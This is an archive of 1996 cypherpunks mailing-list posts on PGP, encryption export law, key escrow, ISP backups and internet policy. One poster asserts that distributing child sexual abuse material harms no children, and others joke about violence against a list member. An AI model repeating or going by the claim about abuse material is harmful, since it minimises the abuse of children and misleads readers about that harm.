BTW, if you do put either or both on floppy to take to your bank, encrypt 
the files using PGP's  single-key encrypt capability, using a long and 
highly non-memorizable key. (Use a freshly demagnetized, formatted floppy, 
being careful not to put any non-encrypted files on it, even temporarily.)  
That way, if somebody (police, Feds, etc) break into your deposit box, they 
get NOTHING. 

You still have to "remember" that long, non-memorizable key, although 
something like that can be written on paper and well-hidden and/or split up 
into parts.  It's only value is to decrypt that bank-stored floppy.

>
>Two questions:
>
>1. Does anyone think that legislation might be passed which would
>criminalize my communications with Ray?

The politicians and cops and TLA's would certainly love this, but it doesn't 
look too likely for the next five years or so, at least in America and 
probably not Europe.  However, somebody just posted an item about 
illegalizing "networked computers" in Burma...

If you're worried about this, how about giving PGP to as many friends as 
have computers, to increase its usage?  The more who use it and are aware of 
the political issue behind it, the less likely the politicians are to pull 
the wool over the collective eyes of the public.

>2. Suppose someone writes a program Z that has no expicit crypto code in
>it, but has hooks for installing one or another version of PGP. Given a
>copy of Z, someone in this country could install PGP he got from MIT,
>whereas someone in Europe could install the international version.
>Would export of Z violate ITAR restrictions?


Nobody seems to know for sure, but this has been discussed a number of times 
around here.  I happen to believe that using ITAR to even restrict the 
export of encryption is an abuse.  Attempting to restrict a program which 
can interface with external encryption is even sillier.  (by that standard, 
an operating system interfaces with PGP, which would make MSDOS restricted 
if ITAR were interpreted in this way.)

The really odd thing is that exports of Pentium computers aren't restricted, 
apparently, yet an X86 clone is just as much a tool of encryption as the 
software.  And if you ask a person, "would you rather have a copy of PGP and 
no computer, or a 166 MHz Pentium computer and no copy of PGP?" the answer 
most intelligent people would give is the latter, since getting PGP is easy 
and free.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 10 Oct 1996 13:45:34 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: [Noise] Re: MISTY Algorithm
Message-ID: <3.0b33.32.19961010134028.00d3b774@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:12 AM 10/10/96 -0400, John Young wrote:
>Nikkei Industrial Daily, October 08, 1996

>Mitsubishi Electric Corp. said it has released the design 
>principles for its data encryption algorithm MISTY. In 
>doing so, the company can enlist third-party users to 
>evaluate the integrity and power of its encryption 
>algorithm and gain wider name recognition for MISTY.

I beleive this algorythm was created by a Dr. Clayton Forrester of the
Gizmotics institute.

I could reveal the source to you, but then I would have to kill you with a
forklift.


---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 10 Oct 1996 10:58:19 -0700 (PDT)
To: everheul@NGI.NL
Subject: Re: AW: Binding cryptography - a fraud!
Message-ID: <01IAHAMJ46VK9S3RCA@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"everheul@NGI.NL"  "Eric Verheul" 10-OCT-1996 07:31:16.85

>First of all, that (and the legitimacy of "wiretaps" in general) is 
>something that should
>be regulated in national law (including procedures, checks and balances, 
>penalities). Maybe
>you have the opinion that that is impossible to achieve, [or at least that 
>making wiretapping
>as such by government impossible is the only satisfactory way of doing it 
>(-; ]. Our concept
>assumes that it is possible and acceptable, although legislation (and 
>especially appliance of
>it) in some countries might be improved..

	I would be curious as to whether you believe that China should be
permitted to do censorship as part of "national law." If your answer is yes,
I would ask if you would believe that Germany's Holocaust was something that
should be permitted as a part of "national law." In other words, national
sovereignty is not something that should be permitted to override individual
liberties.

>Wait a minute. It is a *voluntary* system, but it has some rules that 
>apply. The whole
>idea here is: if you don't like it, use your own system. "Fraude" refers to 

	It is only theoretically a voluntary system; governments such as
China's, Germany's, etcetera could require that it be used with these
goverments as the TRA (or, essentially equivalently, someone licensed by
such a government).

>>Maybe I'm biased:  I'm a libertarian who believes that sending the wrong
>>bits shouldn't be considered a crime.  The problem we have is with the
>Depends, it might be childrens pornography. The information society is 
>*not* about
>bits, but about information.

	If the bits carry information, then restricting the bits is restricting
the information. I would point out that no harm whatsoever is being done to
children in the _distribution_ of such pornography; such harm is only done in
the _manufacture_ of such pornography (if, that is, actual children are used;
currently there are various efforts to make computer-simulated "child
pornography" illegal.)
	Quite simply, you've invented a system that makes censorship more
possible. As a scientist, I try to avoid areas that have such negative
effects; I won't work on biological warfare, for instance. I would like to
suggest that you follow such ethics also; you have not.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <rollo@artvark.com> (Rollo Silver)
Date: Fri, 11 Oct 1996 04:51:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Say what?
Message-ID: <v03007802ae8303ba6d43@[206.183.203.4]>
MIME-Version: 1.0
Content-Type: text/plain


I'm enclosing a header taken from a message in <Cypherpunks Lite Digest
96/10/05>. Can anyone tell me how to determine (1) who wrote it; (2) who
sent it  to me; (3) Who was the original recipient?

It seems like it's to Cypherpunks Lite <cp-lite@comsec.com>, but that can't
be it, since the author starts by saying "I must first say that your
program is one of the finest in news reporting, and I tune in every day."

>From owner-cp-lite  Sat Oct  5 19:13:54 1996
Return-Path: owner-cp-lite
Received: from localhost (eb@localhost) by comsec.com (8.6.5/8.6.5) id
TAA21237 for cp-lite-real; Sat, 5 Oct 1996 19:13:54 -0700
Received: from localhost (eb@localhost) by comsec.com (8.6.5/8.6.5) id
TAA21233; Sat, 5 Oct 1996 19:13:54 -0700
Message-Id: <199610060213.TAA21233@comsec.com>
To: Cypherpunks Lite <cp-lite@comsec.com>
Sender: owner-cp-lite@comsec.com
Date: Thu, 3 Oct 1996 15:38:11 -0700 (PDT)
From: Ernest Hua <hua@chromatic.com>
Subject: Lack of reporting on CALEA and Encryption issues ...
Precedence: bulk

I must first say that your program is one of the finest in news
reporting, and I tune in every day.

Rollo Silver / Amygdala | e-mail: rollo@artvark.com
216M N. Pueblo Rd, #107 | Website: http://www.artvark.com/artvark/
Taos, NM 87571 USA      | Voice: 505-751-9601; FAX: 505-751-7507






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 10 Oct 1996 14:03:15 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LET'S MEET DIMITRI
Message-ID: <199610102102.OAA14524@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri,  an honest to goodness Kook o.t.m.?  And in the Bay Area!  
I'm there!

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 10 Oct 1996 15:09:01 -0700 (PDT)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
Message-ID: <199610102208.PAA05484@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:08 PM 10/10/96 -0800, Timothy C. May wrote:
>At 11:42 AM -0700 10/10/96, Bill Frantz wrote:
>>At 10:13 AM 10/9/96 -0800, Timothy C. May wrote:
>>>Something ISPs could do--and may do if there is sufficient customer
>>>pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
>>>technical term). That is, to have an explicit policy--implemented in the
>>>software--of _really_ deleting the back messages once a customer downloads
>>>them to his site. This means that _backups_ must be done in a careful
>>>manner, such that even the backup tapes or disks are affected by a removal.
>>
>>One technical approach is described in:
>>
>>"A Revocable Backup System", dabo@cs.princeton.edu (Dan Boneh) and
>>rjl@cs.princeton.edu (Richard J. Lipton) in The 6th USENIX Security
>>Symposium Proceedings.
>>
>>Basically the idea is to encrypt the file on the backup (tape) and then
>>lose the encryption key when you want to "forget" the file.
>
>Given that keys = data, this just transfers the problem from one set of
>data to another set of data. (Wanna bet a lot of ISPs would keep backups of
>the disk with the keys on it?)

Agreeded.  I was assuming some degree of competence on the part of the ISP.
 Since it is a service they are offering, they are responsible for its
correct operation.  Reducing the size of the data you must lose is quite
valuable.  It means you don't have to pass large amounts of tape to stomp
on the file.

The article offers some solution to this problem, as I remember, but I
don't really have time to re-read it and summerize (unless you want to
outbid my current client :-).


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 10 Oct 1996 15:14:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "Internet II" and Clinton
Message-ID: <v03007802ae83337dd375@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Clinton has unveiled his plans, such as they are, for what he calls
"Internet II," combining in his announcement $100 million in funding for
school links, "an Internet account for every high school student," and
(unspecified) speed improvements to the Internet.

(I wonder if he thinks the Internet belongs to the U.S., or is controlled
by the U.S.?)

The implications for our list are as we have long talked about. Potentially:

* a government attempt to reassert some sort of control over the Internet,
a la the "we paid for the Arpanet, so we can control what it's used for."

(Of course, the Internet is no longer what it once was, and it is not a
specific network the USG can claim to own or control. It's more of a
"protocol," a set of agreements on how packets, messages, newsgroups, etc.
will be carried. I'm using the term "Internet" in its largest sense, as
"the Net.")

* all of these schoolchildren are gonna need to be protected from filthy
Web sites, unrestricted free speech, pedophiles, money launderers (and
moneychangers), Hemlock Society advocates, gay and lesbo rights groups, the
NRA< and other assorted Horsemen. Look for increased school purchases of
filter software, various laws tightening up what U.S. sites carry
(depending on how the  CDA gets resolved).

* my prediction from a few years ago: "the Internet Driver's License." Or,
worse, all packets must have True Names attached in some way. (The smallest
packets, a la ATM, may be too small to carry IDs, but larger-granularity
packets may have to carry IDs, digital sigs, etc.)

Of course, it may be that Clinton is just posturing for the upcoming
election, and the "Internet II" will be a trivia question a few years from
now.

But now that the politicians have well and truly discovered the Net, look out.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Oct 1996 15:41:15 -0700 (PDT)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010175149.27368B-100000@beast.brainlink.com>
Message-ID: <Pine.SUN.3.91.961010152126.10434B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 10 Oct 1996, Ray Arachelian wrote:

> I hereby pledge $50. :)  Now who is funding the baseball bat
> committee on this same topic? :)

Thanks you Ray.  Now who's next?


 S a n d y

P.S.	Regretably, if Dimitri has big enough 'nads to
	take us up on this offer, as my guest, he will
	be under the mantle of my protection.  Therefore,
	no kinetic, edged or energy weapons allowed.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 10 Oct 1996 15:26:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Swan song...
In-Reply-To: <325D0249.1E36@gte.net>
Message-ID: <199610102226.PAA26543@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


 dthorn@gte.net wrote to All:

 d> Perry E. Metzger wrote:

 >> Well, folks, after four or five years here, I'm finally leaving.

 d> I haven't been on the list more than 6-8 weeks...

You might be expected to defer to those of us who have been here for
years and have seen the list go terribly downhill.

 d>  ...but in that time, it's
 d>  been more interesting than I would have guessed for a non-technical
 d>  forum, which isn't necessarily good...

It's especially not "nesessarily good" when the list was _supposed_ to
be a technical forum concerning cryptography and privacy technology,
along with the few posts concerning pending legislation and the social
effects of such tech.

Now, the average day's traffic is about two-thirds pure noise.  What on
earth is interesting about _that_?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Oct 1996 15:40:33 -0700 (PDT)
To: Cypherpunks <cypherpunks@toad.com>
Subject: PLEDGES
Message-ID: <Pine.SUN.3.91.961010152846.10434D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Just got a private pledge for another $50.  With Ray's $50 and
my $100, we are making a big dent in the cost of getting Dimitri
out here.  Still haven't heard from Dimitri, though.  (I guess 
it's hard to type one-handed.)  :-)

In the likely circumstance that we get more money pledged than is 
required to fete Dimitri, I'll return the excess to donors on a
pro rata basis.  For now, though, I need more pledges.  Thanks.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 10 Oct 1996 16:14:15 -0700 (PDT)
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Bill Gates Comment on White House crypto proposal (fwd)
Message-ID: <Pine.3.89.9610101516.A14989-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


[This just came over the fight-censorship list.]

---------- Forwarded message ----------
Date: Thu, 10 Oct 1996 11:20:47 +0000
From: Jim Rapp <InfoCker@postoffice.worldnet.att.net>
To: declan@well.com
Subject: Bill Gates Comment on Crypto


Posted at 11:03 AM PT, Oct 9, 1996

NEW YORK -- Microsoft Corp. Chairman and CEO Bill Gates pitched the
Windows NT operating system here Wednesday as more similar to Unix than
different during a keynote address at Unix Expo. 

Gates also used his time on stage in the packed auditorium to comment on
the encryption battle which U.S. companies are currently fighting with the
federal government. The "U.S. government is making it fairly difficult for
companies like Microsoft who want to use strong cryptographic techniques,"
Gates said. 

Two weeks ago, the Clinton administration announced that U.S. companies
would be allowed to export products encrypted with a 56-bit key, up from
the 40-bit-based key currently permitted, but Gates characterized this
improvement as "tiny." A 56-bit key "is not nearly good enough," Gates
said. 

InfoWorld Publishing Company 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 10 Oct 1996 16:01:50 -0700 (PDT)
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: pgp, edi, s/mime
In-Reply-To: <325D296E.796D3740@cs.berkeley.edu>
Message-ID: <Pine.3.89.9610101541.A25695-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 10 Oct 1996, Raph Levien wrote:
> I think you're referring to the possibility that PGP 3.0 may use a
> public key algorithm other than RSA. However, if this is the case, it
> won't be compatible with PGP's installed base. In addition, I don't
> believe that there has been a public key encryption algorithm proposed
> which is free of patent controversy.

In about a year, ElGamal will be free from any patent burden. I have 
talked with leading users of RSA who believe that the savings by 
switching from RSA to ElGamal may be a powerful incentive for doing so.

However, the general feeling is that somebody, not said corporations, 
would have to first set up an infrastructure that uses ElGamal.

A chicken and egg problem? Or another Cypherpunks project?

--Lucky, who'd really would like to see ElGamal in wider use.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 10 Oct 1996 13:21:19 -0700 (PDT)
To: declan@eff.org>
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <Pine.SUN.3.91.961010055215.6351C-100000@eff.org>
Message-ID: <Pine.LNX.3.95.961010160627.792A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 10 Oct 1996, Declan McCullagh wrote:

> A month or two ago, I searched through the existing DT statute and posted 
> language that could be interpreted as applying to ISPs. If there's an ISP
> exemption I missed, please post...

I originally read that ISP's were exempt from a Wired article in the February
'96 issue.  I did some searching on EFF's web site and found the text of the
1994 draft of DT.  The bill says that information services and private networks
are exempt from the requirements of subsection (a).  I have no idea what
subsection a is, but a seperate analysis by the EFF does say that the bill
does not apply to Internet Service Providers.  Maybe there is some section
of the bill that does cover ISP's, but I don't think it is anything relating
to facilitating wiretapping.

I found this information at
http://www.eff.org/pub/Privacy/Digital_Telephony_FBI.

Mark 
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMl1aaizIPc7jvyFpAQFQdAgAoiWWFAEAnZY8Wa/b/LjbTGjxpG4C3IIJ
n2R7vyE7Xu3w6xLYE8bwv27zuULgo0frw9Cw45fOehelT5x/e8wazNDjJ/zddBUu
aE+6Nm1s6bAYVr+eIIaDT+uWz4S/H3HT2QNCmypXC0suecXtKqpSa0Ug4HsxQCYV
yHOovHZAmIAMbKHvoZ8FlnXG4YCYD9yoIVL4HMuBW4pNqCfNs1VqzegfoBiOs4E/
AOwTuSSC0W0frh6joDyt0Oymi8dd1rPvI2U5gYQxntKc8sd31XPJoL4Qr/e091q1
1mVOxJbrVH2DHRNR/WE8+iiU2tBCss4H9bk1kVsodnRogyPjUDfyuQ==
=RX8E
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Thu, 10 Oct 1996 16:19:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: AW: Binding cryptography - a fraud!
In-Reply-To: <01BBB6EF.D6A076E0@port04.ztm.pstn.rijnhaave.net>
Message-ID: <v03007800ae83410a0607@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Eric Verheul <everheul@NGI.NL> writes:
[...]
>The whole problem is that you don't trust your government, well I do (till
>some
>extend). I get the impression that this is a typical USA problem.

This is a typical problem with people who have had some experience with
freedom (however limited), most of these people happen to be Americans.
Governments are run by people, so why are these people any more worthy
of trust than the hacker who lives next door?  Part of the reason for American
distrust of government agencies is that these organizations have a history
of abusing the powers entrusted to them.  Unless there is a proven need for
these capabilities why give up such liberties?  If we wanted to be EuroSheep
we would be living over there.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Oct 1996 13:47:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DCSB: The Election and Digital Commerce Agenda
Message-ID: <v03007801ae830e386c67@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

                 The Digital Commerce Society of Boston

                               Presents
                          Philip S. Corwin,
                              Principal,
                    Federal Legislative Associates

                   "The Impact of the 1996 Election
                   on Washington's ECommerce Agenda"



                        Tuesday, November 5, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA




Mr. Corwin is a Principal of Federal Legislative Associates (FLA), a
Washington, DC government relations firm whose clients include
organizations involved with such issues as internet payments security,
computer crime, encryption export restrictions, and the unauthorized
distribution of copyrighted material over the Internet. He has been
involved in legislative activities for twenty years, including five
years on the U.S. Senate's professional staff. Immediately prior to
joining FLA he served as Director and Counsel for Operations, Retail
Banking, and Risk Management for the American Bankers Association, where
his portfolio included payments system policy, bank cards, consumer
compliance, and money laundering.  He is Official Reporter of the
American Bar Association's Task Force on Regulatory Barriers, Committee
on the Law of Commerce in Cyberspace. His articles on a broad range of
financial system topics have been published in numerous publications
here and abroad, including American Banker's Future Banking. He has
testified before Congress and has been interviewed on such programs as
the MacNeil/Lehrer Newshour, The Wall Street Journal Report, CNN
Newsmaker, and CNBC Capitol Gains.

"The Impact of the 1996 Election on Washington's ECommerce Agenda" will
discuss the myriad federal legislative and regulatory initiatives which
will shape the legal infrastructure for ECommerce. In particular, it
will focus on Internet payments and digital value: the Federal Reserve
and FDIC regulatory initiatives on stored value cards; money laundering;
digital counterfeiting and financial system safety and soundness;
taxation of Internet commerce; and the monetary policy implications of
electronic free banking in competition with central banking. Mr. Corwin
will also discuss the 104th Congress' attention to encryption export
standards, Internet copyright protection, Internet privacy, and computer
security and espionage, as well as general Congressional oversight of
electronic banking. Finally, He will make some predictions about the
disposition of these and other matters in the next Congress.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, November 5, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is
$27.50. This price includes lunch, room rental, and the speaker's lunch.
;-).  The Harvard Club *does* have dress code: jackets and ties for men,
and "appropriate business attire" for women.

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, November 2, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Planned speakers for DCSB are:

 December  "Black Unicorn"   Money Laundering: The Headless Horseman
                               of the Infocalypse
 January    TBA              1996 in Review / Predictions for 1997
 February   Rodney Thayer    Applying PGP To Digital Commerce

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you
want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston




-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b3

iQCVAwUBMl1dH/gyLN8bw6ZVAQG3MQP8CndlQ87Smpwjpky4o08vNLzr24lURKm4
M1lEFKTXuscXwb4wLS+0T003jbYqUWpSlwyzodpkogVc0avSTxMKwl1o9VVScgjf
AjWFBmJ3/43i/5einwqRPR0csfonGznoT5oWq+9G0R1HrtYkrTSVI5BctdK+W+zV
bJGqAanUcp8=
=PEH4
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Thu, 10 Oct 1996 08:21:48 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: AW: Binding cryptography - a fraud-detectible alternative to key-esc
Message-ID: <01BBB6C9.D8205560@port10.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


>Bert-Jaap Koops <E.J.Koops@kub.nl> writes on cpunks:
>> We present an alternative that can give law-enforcement agencies
>> access to session keys, without users having to deposit private
>> keys.  Unilateral fraud in this scheme is easily detectible.
>
>OK, so I can see how the `binding data' technique acheives a more
>robust form of keys escrow of session keys, without handing over
>private keys.  (Your wording also implied to me that the problem would
>not exist if private keys were handed over, but I think this is not
>the case, if a warrant is required to get the private keys, the stated
>presumtion is that no speculative decryptions will be tried).  Also
>the proposal (and other proposals which escrow session keys) doesn't
>really provide any guarantees of protection from LE abuse, as such,
>because they can decrypt all of the escrowed session keys with their
>own private key
No. In the scheme Law Enforcement (that is your LE, right?) agencies are never
handed over the private keys of Trusted Retrieval Parties (TRPs), only the session
keys. So for each sessionkey LEs will have to go to a TRP. Moreover, the choice
of TRPs should be large, so the idea is that you can always pick one you trust. Or
set up your own, for that matter... 
>
[stuff deleted]
>However, simpler approaches I think fulfill the requirements given the
>(stated) voluntary nature of GAK.
>
>For instance, if you are using a hybrid RSA/symmetric key system with
>the session key encrypted with RSA, you can encrypt the session key to
>a second recipient also (PGP allows this much, Carl Ellison suggested
>this for PGP, Bill Stewart recently also suggested the same).  If the
>recipient wishes to check that the sender is really escrowing the same
>session key, this can be acheived by revealing to the primary
>recipient the random padding of the second recipient's RSA encrypted
>copy of the session key.  The primary recipient can then repeat the
>encryption, and check.  (I proposed this on sci.crypt last year some
>time, with an anti-GAK caveat :-).

In our scheme any third party, which is probably never a TRP, can check
equality of the sessionkeys send to the primary recipient (the TRP) and
the second recipient (the real adressee), i.e. *without* needing secret
information! In your suggestion checking can only be done with secret
information (you need the secret key of the primary recipient). Also,
"random padding" information of the second recipient is very secret as well, just 
compare the results Don Coppersmith presented on Eurocrypt97: if you
know the enough padding you know it all. So for instance sending
along the padding info along will make any key-escrow superflous (-;
   

>As GAK is (stated to be) voluntary, surely the only person who has any
>business knowing whether the message is honestly GAKked is the
>recipient.  After all you can double encrypt or not use GAK at your
>option, so this seems to lose nothing for the GAKkers.
>
>The description of the paper also says nothing about trust worthiness
>of the TTPs, from the public's perspective.
As far as we are concerned, anybody - willing to follow regulating - can set
up his own TRP.



      > (Not that I,
>or anyone else would want to use GAK still, but it would be a gesture
>of good will on the part of the GAKkers, and would show intentions not
>to misuse the system.  I suggest that they would never agree to such a
>system because their stated aims are untrue: they *do* want to outlaw
>non-escrowed encryption for domestic US traffic, and they *do* want to
>decrypt without warrants, and without public audit.  Export control
>and temporarily `voluntary' GAK is a means, not an end.)
Who is they, governments as a whole? If you simplify discussions in this
way, I might as well say: "you guys only want to help criminals". I understand
your fears, but don't exaggerate.

Eric Verheul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 11 Oct 1996 11:08:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Londinium
Message-ID: <845057044.19828.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 
> May be you knew this.  A few months back in the UK, some nut flipped
> and shot up a school full of kids, finishing up by shooting himself
> (sadly for the press, his second cousin once removed, did not have an
> internet account).  Much media teeth gnashing about hand guns, and
> tighter gun laws ensued.  (The guy had a gun license, something which
> is needed to legally own a gun in the UK.)

Yeah, and we`re looking at more fucked up laws possibly completely 
banning handguns over here.
 
> The Schoolyard Slaughter game is I think a joke by someone with a
> funny sense of humor, playing on this incident.

Actually the PD library distributing the game said it was produced 
and released some months before the incident in Dunblane, but I can`t 
verify whether they were just covering themselves or if this is the 
truth, whatever the case, it is irrelevant, the game will probably be 
removed from circulation now for no legitimate reason other than a 
few nutters on a mission against guns happen not to like it.

 
 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Thu, 10 Oct 1996 13:46:52 -0700 (PDT)
To: rollo@artvark.com
Subject: Re: Why not PGP?
In-Reply-To: <v03007804ae82d4baa7bb@[206.183.203.4]>
Message-ID: <Pine.SUN.3.95.961010164556.6649L-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996 rollo@artvark.com wrote:

> Two questions:
> 
> 1. Does anyone think that legislation might be passed which would
> criminalize my communications with Ray?

Yes.  But I don't think the courts would uphold it in the face of a
well-presented constitutional challenge.  See

http://www.law.miami.edu/~froomkin/articles/clipper.htm

> 
> 2. Suppose someone writes a program Z that has no expicit crypto code in
> it, but has hooks for installing one or another version of PGP. Given a
> copy of Z, someone in this country could install PGP he got from MIT,
> whereas someone in Europe could install the international version.
> Would export of Z violate ITAR restrictions?

Yes, but these are currently being challenged in 3 separate court actions.

The administration asserts, however, that "hooks" are every bit as
unexportable as the real thing. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 17:15:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto- and AP-relevant wire clippings
Message-ID: <6XPLVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


